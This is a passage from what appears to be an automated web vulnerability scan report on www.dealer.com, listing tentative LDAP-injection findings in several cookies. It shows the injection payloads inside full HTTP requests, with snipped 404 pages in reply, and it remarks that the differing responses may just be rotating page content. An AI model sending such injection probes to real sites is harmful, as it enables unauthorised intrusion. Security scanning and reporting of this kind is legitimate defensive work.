com.silverpop.iMA.page_visit./press/dealer.com-wins-2011-diamond-awards-for-website-design-and-internet-trainin/=*)!(sn=*; com.silverpop.iMA.page_visit./showcase/featured-client/=1; com.silverpop.iMA.page_visit./products/lead-management/=1; com.silverpop.iMA.page_visit./products/lead-management/call-tracking/=1; com.silverpop.iMA.page_visit./products/online-advertising/powermail/=1; com.silverpop.iMAWebCookie=1b371563-da21-14c5-db4d-407b95beb159; com.silverpop.iMA.session=20a481a9-716c-08d8-9179-6804e373028e; exp_last_activity=1303002983; exp_tracker=a%3A4%3A%7Bi%3A0%3Bs%3A30%3A%22%2Fproducts%2Finventory-marketing%2F%22%3Bi%3A1%3Bs%3A39%3A%22%2Fproducts%2Fonline-advertising%2Fpowermail%2F%22%3Bi%3A2%3Bs%3A40%3A%22%2Fproducts%2Flead-management%2Fcall-tracking%2F%22%3Bi%3A3%3Bs%3A26%3A%22%2Fproducts%2Flead-management%2F%22%3B%7D; __utma=161351586.382883849.1303002182.1303002182.1303002182.1; __utmc=161351586; __utmb=161351586.47.10.1303002182

Response 2

HTTP/1.1 404 Not Found
Server: Apache
imagetoolbar: no
Content-Type: text/html; charset=UTF-8
X-DDC-Arch-Trace: ,HttpResponse
Content-Length: 20284
Vary: Accept-Encoding
Date: Sun, 17 Apr 2011 01:29:00 GMT
Connection: close
Set-Cookie: exp_last_activity=1303003739; expires=Mon, 16-Apr-2012 01:28:59 GMT; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <title>404 | Dealer.com | Car Deal
...[SNIP]...
<p>We depend very heavily on the SEO team at Dealer.com to ensure that our goals are accomplished as it relates to where we show up in the search engines.</p>
   <cite>Jana Kusin, Gillman Auto Group</cite>
</blockquote>
</li>

<li class="odd">
<blockquote>
   <p>Our sites perform better now than they ever have. Our dealers are very happy with our performance. Everyone&#8217;s extremely pleased with Dealer.com.</p>
   <cite>Cassie Broemmer, Van Tuyl Auto Group</cite>
</blockquote>
</li>

<li class="even">
<blockquote>
   <p>Total Control Dominator has really helped us out, and the fact that it is integrated with a lot of other functions on the website is very helpful.</p>
   <cite>Andrew DiFeo, Hyundai of St. Augustine</cite>
</blockquote>
</li>

<li class="odd">
<blockquote>
   <p>The transition to Dealer.com from our previous provider was way beyond my expectations. If someone were to contact me for advice regarding which website provider would be the best, I would say Dealer.com, hands down. </p>
   <cite>Justin Brun, Acton Toyota of Littleton</cite>
</blockquote>
</li>

<li class="even">
<blockquote>
   <p>For dealers who want to compete using SEO, they don&#8217;t need to build outside microsites for content anymore. They can do it right inside the Dealer.com platform.</p>
   <cite>Brian Pasch, Pasch Consulting Group</cite>
</blockquote>
</li>

        </ul>
   </div> <!-- end .first -->
   <div class="group">
       <ul id="ads" class="cycle">
                   
<li>
   <a href="/products/websites/mobile-sites/" title="MobileSites Spotlight"><img src="http://pictures.dealer.com/d/dealerdotcom/uploads/ads/spotlight-mobilesites1.jpg" alt="Mobile Websites" /></a>
</li>

<li>
   <a href="/products/websites/videosmartsites/" title="Video SmartSites Spotlight"><img src="http://pictures.dealer.com/d/dealerdotcom/uploads/ads/spotlight-video-smartsites.jpg" alt="Bring your inventory to life with Video Enhanced Websites" /></a>
</li>

<li>
   <a href="/products/inventory-marketing/carflix/" title="CarFlix Spo
...[SNIP]...

1.6. http://www.dealer.com/products/lead-management/media/uploads/page/loading.gif [__utma cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.dealer.com
Path:   /products/lead-management/media/uploads/page/loading.gif

Issue detail

The __utma cookie appears to be vulnerable to LDAP injection attacks.

The payloads *)(sn=* and *)!(sn=* were each submitted in the __utma cookie. These two requests resulted in different responses, indicating that the input may be incorporated into a conjunctive LDAP query in an unsafe manner.

Request 1

GET /products/lead-management/media/uploads/page/loading.gif HTTP/1.1
Host: www.dealer.com
Proxy-Connection: keep-alive
Referer: http://www.dealer.com/products/lead-management/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ssoid=60f9d9d10a0a00ed0114d7394bf06e06; exp_last_visit=987642161; __utmz=161351586.1303002182.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); com.silverpop.iMA.page_visit./=1; com.silverpop.iMA.page_visit./solutions/franchise-dealers/=1; com.silverpop.iMA.page_visit./products/online-advertising/=1; com.silverpop.iMA.page_visit./products/online-advertising/search-engine-optimization/=1; com.silverpop.iMA.page_visit./products/websites/=1; com.silverpop.iMA.page_visit./products/inventory-marketing/=1; com.silverpop.iMA.page_visit./products/inventory-marketing/epricer/=1; com.silverpop.iMA.page_visit./blog/=1; com.silverpop.iMA.page_visit./company/events/=1; com.silverpop.iMA.page_visit./press/=1; com.silverpop.iMA.page_visit./company/awards/=1; com.silverpop.iMA.page_visit./company/history/=1; com.silverpop.iMA.page_visit./blog/2010/06/=1; com.silverpop.iMA.page_visit./lvlc/=1; com.silverpop.iMA.page_visit./press/dealer.com-wins-2011-diamond-awards-for-website-design-and-internet-trainin/=1; com.silverpop.iMAWebCookie=1b371563-da21-14c5-db4d-407b95beb159; com.silverpop.iMA.page_visit./showcase/featured-client/=1; com.silverpop.iMA.session=20a481a9-716c-08d8-9179-6804e373028e; exp_last_activity=1303002850; exp_tracker=a%3A4%3A%7Bi%3A0%3Bs%3A26%3A%22%2Fproducts%2Flead-management%2F%22%3Bi%3A1%3Bs%3A26%3A%22%2Fshowcase%2Ffeatured-client%2F%22%3Bi%3A2%3Bs%3A6%3A%22%2Flvlc%2F%22%3Bi%3A3%3Bs%3A14%3A%22%2Fblog%2F2010%2F06%2F%22%3B%7D; __utma=*)(sn=*; __utmc=161351586; __utmb=161351586.41.10.1303002182

Response 1

HTTP/1.1 404 Not Found
Server: Apache
imagetoolbar: no
Content-Type: text/html; charset=UTF-8
X-DDC-Arch-Trace: ,HttpResponse
Content-Length: 20356
Vary: Accept-Encoding
Date: Sun, 17 Apr 2011 01:28:58 GMT
Connection: close
Set-Cookie: exp_last_activity=1303003737; expires=Mon, 16-Apr-2012 01:28:57 GMT; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <title>404 | Dealer.com | Car Deal
...[SNIP]...
<p>We were able to have our design and brand vision executed. It is very important that we look the way we want to look and that we represent our company and our brand in a specific way and Dealer.com accomplished that. &#8230;</p>
   <cite>Alan Krutsch, Walser Auto Group</cite>
</blockquote>
</li>

<li class="odd">
<blockquote>
   <p>With Dealer.com, we continuously improve and advance. We added video to our website this year and doubled the average time people spend on our site.</p>
   <cite>Rich Somers, ecommerce Director, Toyota Scion of Scranton</cite>
</blockquote>
</li>

<li class="even">
<blockquote>
   <p>Unlike TV, newspaper or radio, where I know they just want me to up my budget, I feel like the people at dealer.com actually give me suggestions and I'll be able to track everything to make sure that it works and &#8230;</p>
   <cite>Chris Comisky, Nemer Motor Group</cite>
</blockquote>
</li>

<li class="odd">
<blockquote>
   <p>We have more visitors on our site than we do cars that go by on the street. If that's not powerful, I don't know what is. Dealer.com knows how to sell cars on the Internet. </p>
   <cite>Dave Cook, President of the Norris Auto Group</cite>
</blockquote>
</li>

<li class="even">
<blockquote>
   <p>One of Dealer.com's greatest advantages is the reporting. The speed of the reporting tool, the ease of use and the timely, relevant data allow me to make changes on the fly.</p>
   <cite>Andrew DiFeo, Hyundai of St. Augustine</cite>
</blockquote>
</li>

        </ul>
   </div> <!-- end .first -->
   <div class="group">
       <ul id="ads" class="cycle">
                   
<li>
   <a href="/products/online-advertising/search-engine-optimization/" title="ManagedSEO Spotlight"><img src="http://pictures.dealer.com/d/dealerdotcom/uploads/ads/ManagedSEO.jpg" alt="Ranked higher in the search engines with ManagedSEO" /></a>
</li>

<li>
   <a href="/products/online-advertising/#service-marketing" title="Service Marketing Spotlight"><img src="http://pictures.dealer.com/d/dealerdotcom/u
...[SNIP]...

Request 2

GET /products/lead-management/media/uploads/page/loading.gif HTTP/1.1
Host: www.dealer.com
Proxy-Connection: keep-alive
Referer: http://www.dealer.com/products/lead-management/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ssoid=60f9d9d10a0a00ed0114d7394bf06e06; exp_last_visit=987642161; __utmz=161351586.1303002182.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); com.silverpop.iMA.page_visit./=1; com.silverpop.iMA.page_visit./solutions/franchise-dealers/=1; com.silverpop.iMA.page_visit./products/online-advertising/=1; com.silverpop.iMA.page_visit./products/online-advertising/search-engine-optimization/=1; com.silverpop.iMA.page_visit./products/websites/=1; com.silverpop.iMA.page_visit./products/inventory-marketing/=1; com.silverpop.iMA.page_visit./products/inventory-marketing/epricer/=1; com.silverpop.iMA.page_visit./blog/=1; com.silverpop.iMA.page_visit./company/events/=1; com.silverpop.iMA.page_visit./press/=1; com.silverpop.iMA.page_visit./company/awards/=1; com.silverpop.iMA.page_visit./company/history/=1; com.silverpop.iMA.page_visit./blog/2010/06/=1; com.silverpop.iMA.page_visit./lvlc/=1; com.silverpop.iMA.page_visit./press/dealer.com-wins-2011-diamond-awards-for-website-design-and-internet-trainin/=1; com.silverpop.iMAWebCookie=1b371563-da21-14c5-db4d-407b95beb159; com.silverpop.iMA.page_visit./showcase/featured-client/=1; com.silverpop.iMA.session=20a481a9-716c-08d8-9179-6804e373028e; exp_last_activity=1303002850; exp_tracker=a%3A4%3A%7Bi%3A0%3Bs%3A26%3A%22%2Fproducts%2Flead-management%2F%22%3Bi%3A1%3Bs%3A26%3A%22%2Fshowcase%2Ffeatured-client%2F%22%3Bi%3A2%3Bs%3A6%3A%22%2Flvlc%2F%22%3Bi%3A3%3Bs%3A14%3A%22%2Fblog%2F2010%2F06%2F%22%3B%7D; __utma=*)!(sn=*; __utmc=161351586; __utmb=161351586.41.10.1303002182

Response 2

HTTP/1.1 404 Not Found
Server: Apache
imagetoolbar: no
Content-Type: text/html; charset=UTF-8
X-DDC-Arch-Trace: ,HttpResponse
Content-Length: 20027
Vary: Accept-Encoding
Date: Sun, 17 Apr 2011 01:28:59 GMT
Connection: close
Set-Cookie: exp_last_activity=1303003738; expires=Mon, 16-Apr-2012 01:28:58 GMT; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <title>404 | Dealer.com | Car Deal
...[SNIP]...
<p>The backend administrative system is just so easy and fast to use.</p>
   <cite>Greg Nalewaja, General Manager, Metro Honda of Union County</cite>
</blockquote>
</li>

<li class="odd">
<blockquote>
   <p>Dealer.com is always looking for ways to improve, so they're intense in that. They're never standing still and their service is impeccable.</p>
   <cite>Roy Rueter, e-Business Director, Sheehy Auto Stores</cite>
</blockquote>
</li>

<li class="even">
<blockquote>
   <p>The number of visitors has doubled since we went on board nearly a year and a half ago.</p>
   <cite>Mike Nazworth, BDC Manager, Heyward Allen Toyota Scion</cite>
</blockquote>
</li>

<li class="odd">
<blockquote>
   <p>Unlike TV, newspaper or radio, where I know they just want me to up my budget, I feel like the people at dealer.com actually give me suggestions and I'll be able to track everything to make sure that it works and &#8230;</p>
   <cite>Chris Comisky, Nemer Motor Group</cite>
</blockquote>
</li>

<li class="even">
<blockquote>
   <p>From technology, to innovation, to support, I've had an extremely positive experience with Dealer.com.</p>
   <cite>Andrew DiFeo, Hyundai of St. Augustine </cite>
</blockquote>
</li>

        </ul>
   </div> <!-- end .first -->
   <div class="group">
       <ul id="ads" class="cycle">
                   
<li>
   <a href="/products/websites/mobile-sites/" title="MobileSites Spotlight"><img src="http://pictures.dealer.com/d/dealerdotcom/uploads/ads/spotlight-mobilesites1.jpg" alt="Mobile Websites" /></a>
</li>

<li>
   <a href="/products/websites/videoblog/" title="Video Blog Spotlight"><img src="http://pictures.dealer.com/d/dealerdotcom/uploads/ads/Video_Blog.jpg" alt="Enhance SEO with our video blogging tool" /></a>
</li>

<li>
   <a href="/products/websites/videosmartsites/" title="Video SmartSites Spotlight"><img src="http://pictures.dealer.com/d/dealerdotcom/uploads/ads/spotlight-video-smartsites.jpg" alt="Bring your inventory to life with Video Enhanced Websites" /></a>
</li>

<li>
   <a href="
...[SNIP]...

1.7. http://www.dealer.com/products/lead-management/media/uploads/page/loading.gif [com.silverpop.iMAWebCookie cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.dealer.com
Path:   /products/lead-management/media/uploads/page/loading.gif

Issue detail

The com.silverpop.iMAWebCookie cookie appears to be vulnerable to LDAP injection attacks.

The payloads *)(sn=* and *)!(sn=* were each submitted in the com.silverpop.iMAWebCookie cookie. The two requests produced different responses, indicating that the input may be incorporated unsafely into a conjunctive LDAP query. Note that both responses below are the same 404 page: the visible headers differ only in Date, Content-Length (20042 versus 20134) and the Set-Cookie timestamp, and the 404 bodies carry rotating testimonial and ad content that differs between the two captures. This is consistent with the Tentative confidence rating, so the finding should be confirmed manually before being treated as a real injection point.

Request 1

GET /products/lead-management/media/uploads/page/loading.gif HTTP/1.1
Host: www.dealer.com
Proxy-Connection: keep-alive
Referer: http://www.dealer.com/products/lead-management/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ssoid=60f9d9d10a0a00ed0114d7394bf06e06; exp_last_visit=987642161; __utmz=161351586.1303002182.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); com.silverpop.iMA.page_visit./=1; com.silverpop.iMA.page_visit./solutions/franchise-dealers/=1; com.silverpop.iMA.page_visit./products/online-advertising/=1; com.silverpop.iMA.page_visit./products/online-advertising/search-engine-optimization/=1; com.silverpop.iMA.page_visit./products/websites/=1; com.silverpop.iMA.page_visit./products/inventory-marketing/=1; com.silverpop.iMA.page_visit./products/inventory-marketing/epricer/=1; com.silverpop.iMA.page_visit./blog/=1; com.silverpop.iMA.page_visit./company/events/=1; com.silverpop.iMA.page_visit./press/=1; com.silverpop.iMA.page_visit./company/awards/=1; com.silverpop.iMA.page_visit./company/history/=1; com.silverpop.iMA.page_visit./blog/2010/06/=1; com.silverpop.iMA.page_visit./lvlc/=1; com.silverpop.iMA.page_visit./press/dealer.com-wins-2011-diamond-awards-for-website-design-and-internet-trainin/=1; com.silverpop.iMAWebCookie=*)(sn=*; com.silverpop.iMA.page_visit./showcase/featured-client/=1; com.silverpop.iMA.session=20a481a9-716c-08d8-9179-6804e373028e; exp_last_activity=1303002850; exp_tracker=a%3A4%3A%7Bi%3A0%3Bs%3A26%3A%22%2Fproducts%2Flead-management%2F%22%3Bi%3A1%3Bs%3A26%3A%22%2Fshowcase%2Ffeatured-client%2F%22%3Bi%3A2%3Bs%3A6%3A%22%2Flvlc%2F%22%3Bi%3A3%3Bs%3A14%3A%22%2Fblog%2F2010%2F06%2F%22%3B%7D; __utma=161351586.382883849.1303002182.1303002182.1303002182.1; __utmc=161351586; __utmb=161351586.41.10.1303002182

Response 1

HTTP/1.1 404 Not Found
Server: Apache
imagetoolbar: no
Content-Type: text/html; charset=UTF-8
X-DDC-Arch-Trace: ,HttpResponse
Content-Length: 20042
Vary: Accept-Encoding
Date: Sun, 17 Apr 2011 01:25:58 GMT
Connection: close
Set-Cookie: exp_last_activity=1303003558; expires=Mon, 16-Apr-2012 01:25:58 GMT; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <title>404 | Dealer.com | Car Deal
...[SNIP]...
<p>Our account manager is always pleasant, efficient and communicates really well with us.</p>
   <cite>Carrie Casebeer, Capitol Auto Group</cite>
</blockquote>
</li>

<li class="odd">
<blockquote>
   <p>In the 2 years that we have been with Dealer.com, our rankings have drastically improved, and our lead volume has gone up at least 40%.</p>
   <cite>Alex Jefferson, Proctor Dealerships </cite>
</blockquote>
</li>

<li class="even">
<blockquote>
   <p>Total Control Dominator has really helped us out, and the fact that it is integrated with a lot of other functions on the website is very helpful.</p>
   <cite>Andrew DiFeo, Hyundai of St. Augustine</cite>
</blockquote>
</li>

<li class="odd">
<blockquote>
   <p>The number of visitors has doubled since we went on board nearly a year and a half ago.</p>
   <cite>Mike Nazworth, BDC Manager, Heyward Allen Toyota Scion</cite>
</blockquote>
</li>

<li class="even">
<blockquote>
   <p>One of Dealer.com's greatest advantages is the reporting. The speed of the reporting tool, the ease of use and the timely, relevant data allow me to make changes on the fly.</p>
   <cite>Andrew DiFeo, Hyundai of St. Augustine</cite>
</blockquote>
</li>

        </ul>
   </div> <!-- end .first -->
   <div class="group">
       <ul id="ads" class="cycle">
                   
<li>
   <a href="/products/online-advertising/#service-marketing" title="Service Marketing Spotlight"><img src="http://pictures.dealer.com/d/dealerdotcom/uploads/ads/Service_marketingtile_1.jpg" alt="Recapture lost customers & Increase Service Revenue with Service Marketing" /></a>
</li>

<li>
   <a href="/products/online-advertising/#sem" title="TotalControl DOMINATOR Spotlight"><img src="http://pictures.dealer.com/d/dealerdotcom/uploads/ads/TCD_Grey.jpg" alt="TotalControl DOMINATOR" /></a>
</li>

<li>
   <a href="/products/inventory-marketing/carflix/" title="CarFlix Spotlight"><img src="http://pictures.dealer.com/d/dealerdotcom/uploads/ads/CarFlix_3.jpg" alt="Increase conversion with engaging videos with real hum
...[SNIP]...

Request 2

GET /products/lead-management/media/uploads/page/loading.gif HTTP/1.1
Host: www.dealer.com
Proxy-Connection: keep-alive
Referer: http://www.dealer.com/products/lead-management/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ssoid=60f9d9d10a0a00ed0114d7394bf06e06; exp_last_visit=987642161; __utmz=161351586.1303002182.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); com.silverpop.iMA.page_visit./=1; com.silverpop.iMA.page_visit./solutions/franchise-dealers/=1; com.silverpop.iMA.page_visit./products/online-advertising/=1; com.silverpop.iMA.page_visit./products/online-advertising/search-engine-optimization/=1; com.silverpop.iMA.page_visit./products/websites/=1; com.silverpop.iMA.page_visit./products/inventory-marketing/=1; com.silverpop.iMA.page_visit./products/inventory-marketing/epricer/=1; com.silverpop.iMA.page_visit./blog/=1; com.silverpop.iMA.page_visit./company/events/=1; com.silverpop.iMA.page_visit./press/=1; com.silverpop.iMA.page_visit./company/awards/=1; com.silverpop.iMA.page_visit./company/history/=1; com.silverpop.iMA.page_visit./blog/2010/06/=1; com.silverpop.iMA.page_visit./lvlc/=1; com.silverpop.iMA.page_visit./press/dealer.com-wins-2011-diamond-awards-for-website-design-and-internet-trainin/=1; com.silverpop.iMAWebCookie=*)!(sn=*; com.silverpop.iMA.page_visit./showcase/featured-client/=1; com.silverpop.iMA.session=20a481a9-716c-08d8-9179-6804e373028e; exp_last_activity=1303002850; exp_tracker=a%3A4%3A%7Bi%3A0%3Bs%3A26%3A%22%2Fproducts%2Flead-management%2F%22%3Bi%3A1%3Bs%3A26%3A%22%2Fshowcase%2Ffeatured-client%2F%22%3Bi%3A2%3Bs%3A6%3A%22%2Flvlc%2F%22%3Bi%3A3%3Bs%3A14%3A%22%2Fblog%2F2010%2F06%2F%22%3B%7D; __utma=161351586.382883849.1303002182.1303002182.1303002182.1; __utmc=161351586; __utmb=161351586.41.10.1303002182

Response 2

HTTP/1.1 404 Not Found
Server: Apache
imagetoolbar: no
Content-Type: text/html; charset=UTF-8
X-DDC-Arch-Trace: ,HttpResponse
Content-Length: 20134
Vary: Accept-Encoding
Date: Sun, 17 Apr 2011 01:25:59 GMT
Connection: close
Set-Cookie: exp_last_activity=1303003559; expires=Mon, 16-Apr-2012 01:25:59 GMT; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <title>404 | Dealer.com | Car Deal
...[SNIP]...
<p>Ranked #8 in the nation in April and #12 YTD (up from 16th last year), you and your team have been leading our progress.</p>
   <cite>Ken Girard, McGrath Acura of Westmont</cite>
</blockquote>
</li>

<li class="odd">
<blockquote>
   <p>We depend very heavily on the SEO team at Dealer.com to ensure that our goals are accomplished as it relates to where we show up in the search engines.</p>
   <cite>Jana Kusin, Gillman Auto Group</cite>
</blockquote>
</li>

<li class="even">
<blockquote>
   <p>This is an awesome company which just happens to have their headquarters located about 5 minutes away from our dealership. I know their employees personally, I have been inside their building, and I have seen the explosive growth they have achieved. &#8230;</p>
   <cite>John Kimel, Lewis Autos</cite>
</blockquote>
</li>

<li class="odd">
<blockquote>
   <p>I&#8217;ve had access to other people&#8217;s systems, so I can honestly say that Dealer.com is by far the easiest to for the end user.</p>
   <cite>Christopher Della Bella, D&#8217;Ella Auto Group</cite>
</blockquote>
</li>

<li class="even">
<blockquote>
   <p>One of the benefits of Dealer.com is when you manage a whole group, you can log into ControlCenter&#8482; and easily toggle between all stores. It&#8217;s seamless!</p>
   <cite>Kendall Burger, Hansel Auto Group</cite>
</blockquote>
</li>

        </ul>
   </div> <!-- end .first -->
   <div class="group">
       <ul id="ads" class="cycle">
                   
<li>
   <a href="/products/websites/videosmartsites/" title="Video SmartSites Spotlight"><img src="http://pictures.dealer.com/d/dealerdotcom/uploads/ads/spotlight-video-smartsites.jpg" alt="Bring your inventory to life with Video Enhanced Websites" /></a>
</li>

<li>
   <a href="/products/online-advertising/#sem" title="TotalControl DOMINATOR Spotlight"><img src="http://pictures.dealer.com/d/dealerdotcom/uploads/ads/TCD_Grey.jpg" alt="TotalControl DOMINATOR" /></a>
</li>

<li>
   <a href="/products/websites/mobile-sites/" title="MobileSites Spotlight
...[SNIP]...

1.8. http://www.dealer.com/products/online-advertising/powermail/media/uploads/page/loading.gif [com.silverpop.iMA.page_visit./products/lead-management/ cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.dealer.com
Path:   /products/online-advertising/powermail/media/uploads/page/loading.gif

Issue detail

The com.silverpop.iMA.page_visit./products/lead-management/ cookie appears to be vulnerable to LDAP injection attacks.

The payloads d62447ad87cf5458)(sn=* and d62447ad87cf5458)!(sn=* were each submitted in the com.silverpop.iMA.page_visit./products/lead-management/ cookie. The two requests produced different responses, indicating that the input may be incorporated unsafely into a disjunctive LDAP query. Note that both responses below are the same 404 page: the visible headers differ only in Date, Content-Length (20162 versus 20238) and the Set-Cookie timestamp, and the 404 bodies carry rotating testimonial and ad content that differs between the two captures. This is consistent with the Tentative confidence rating, so the finding should be confirmed manually before being treated as a real injection point.

Request 1

GET /products/online-advertising/powermail/media/uploads/page/loading.gif HTTP/1.1
Host: www.dealer.com
Proxy-Connection: keep-alive
Referer: http://www.dealer.com/products/online-advertising/powermail/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ssoid=60f9d9d10a0a00ed0114d7394bf06e06; exp_last_visit=987642161; __utmz=161351586.1303002182.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); com.silverpop.iMA.page_visit./=1; com.silverpop.iMA.page_visit./solutions/franchise-dealers/=1; com.silverpop.iMA.page_visit./products/online-advertising/=1; com.silverpop.iMA.page_visit./products/online-advertising/search-engine-optimization/=1; com.silverpop.iMA.page_visit./products/websites/=1; com.silverpop.iMA.page_visit./products/inventory-marketing/=1; com.silverpop.iMA.page_visit./products/inventory-marketing/epricer/=1; com.silverpop.iMA.page_visit./blog/=1; com.silverpop.iMA.page_visit./company/events/=1; com.silverpop.iMA.page_visit./press/=1; com.silverpop.iMA.page_visit./company/awards/=1; com.silverpop.iMA.page_visit./company/history/=1; com.silverpop.iMA.page_visit./blog/2010/06/=1; com.silverpop.iMA.page_visit./lvlc/=1; com.silverpop.iMA.page_visit./press/dealer.com-wins-2011-diamond-awards-for-website-design-and-internet-trainin/=1; com.silverpop.iMA.page_visit./showcase/featured-client/=1; com.silverpop.iMA.page_visit./products/lead-management/=d62447ad87cf5458)(sn=*; com.silverpop.iMAWebCookie=1b371563-da21-14c5-db4d-407b95beb159; com.silverpop.iMA.page_visit./products/lead-management/call-tracking/=1; com.silverpop.iMA.session=20a481a9-716c-08d8-9179-6804e373028e; exp_last_activity=1303002861; exp_tracker=a%3A4%3A%7Bi%3A0%3Bs%3A39%3A%22%2Fproducts%2Fonline-advertising%2Fpowermail%2F%22%3Bi%3A1%3Bs%3A40%3A%22%2Fproducts%2Flead-management%2Fcall-tracking%2F%22%3Bi%3A2%3Bs%3A26%3A%22%2Fproducts%2Flead-management%2F%22%3Bi%3A3%3Bs%3A26%3A%22%2Fshowcase%2Ffeatured-client%2F%22%3B%7D; __utma=161351586.382883849.1303002182.1303002182.1303002182.1; __utmc=161351586; __utmb=161351586.43.10.1303002182

Response 1

HTTP/1.1 404 Not Found
Server: Apache
imagetoolbar: no
Content-Type: text/html; charset=UTF-8
X-DDC-Arch-Trace: ,HttpResponse
Content-Length: 20162
Vary: Accept-Encoding
Date: Sun, 17 Apr 2011 01:26:59 GMT
Connection: close
Set-Cookie: exp_last_activity=1303003618; expires=Mon, 16-Apr-2012 01:26:58 GMT; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <title>404 | Dealer.com | Car Deal
...[SNIP]...
<p>The transition to Dealer.com from our previous provider was way beyond my expectations. If someone were to contact me for advice regarding which website provider would be the best, I would say Dealer.com, hands down. </p>
   <cite>Justin Brun, Acton Toyota of Littleton</cite>
</blockquote>
</li>

<li class="odd">
<blockquote>
   <p>Dealer.com has lived up to every one of their promises.</p>
   <cite>Mitchell Brenner, Precision Acura</cite>
</blockquote>
</li>

<li class="even">
<blockquote>
   <p>All I can say is WOW! I have never seen so many leads come from a dealership website in my life. We have cut out one of our most expensive lead providers last month because we received 383 leads from our &#8230;</p>
   <cite>Internet Sales Director for a BMW dealership at a top Dealer Group</cite>
</blockquote>
</li>

<li class="odd">
<blockquote>
   <p>For dealers who want to compete using SEO, they don&#8217;t need to build outside microsites for content anymore. They can do it right inside the Dealer.com platform.</p>
   <cite>Brian Pasch, Pasch Consulting Group</cite>
</blockquote>
</li>

<li class="even">
<blockquote>
   <p>It was very important to find someone with a suite of products that could not only help us today, but could help us in the long term.</p>
   <cite>Jana Kusin, Gillman Auto Group</cite>
</blockquote>
</li>

        </ul>
   </div> <!-- end .first -->
   <div class="group">
       <ul id="ads" class="cycle">
                   
<li>
   <a href="/products/inventory-marketing/carflix/" title="CarFlix Spotlight"><img src="http://pictures.dealer.com/d/dealerdotcom/uploads/ads/CarFlix_3.jpg" alt="Increase conversion with engaging videos with real human voices" /></a>
</li>

<li>
   <a href="/products/online-advertising/search-engine-optimization/" title="ManagedSEO Spotlight"><img src="http://pictures.dealer.com/d/dealerdotcom/uploads/ads/ManagedSEO.jpg" alt="Ranked higher in the search engines with ManagedSEO" /></a>
</li>

<li>
   <a href="/products/websites/videosmartsites/" title="Video S
...[SNIP]...

Request 2

GET /products/online-advertising/powermail/media/uploads/page/loading.gif HTTP/1.1
Host: www.dealer.com
Proxy-Connection: keep-alive
Referer: http://www.dealer.com/products/online-advertising/powermail/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
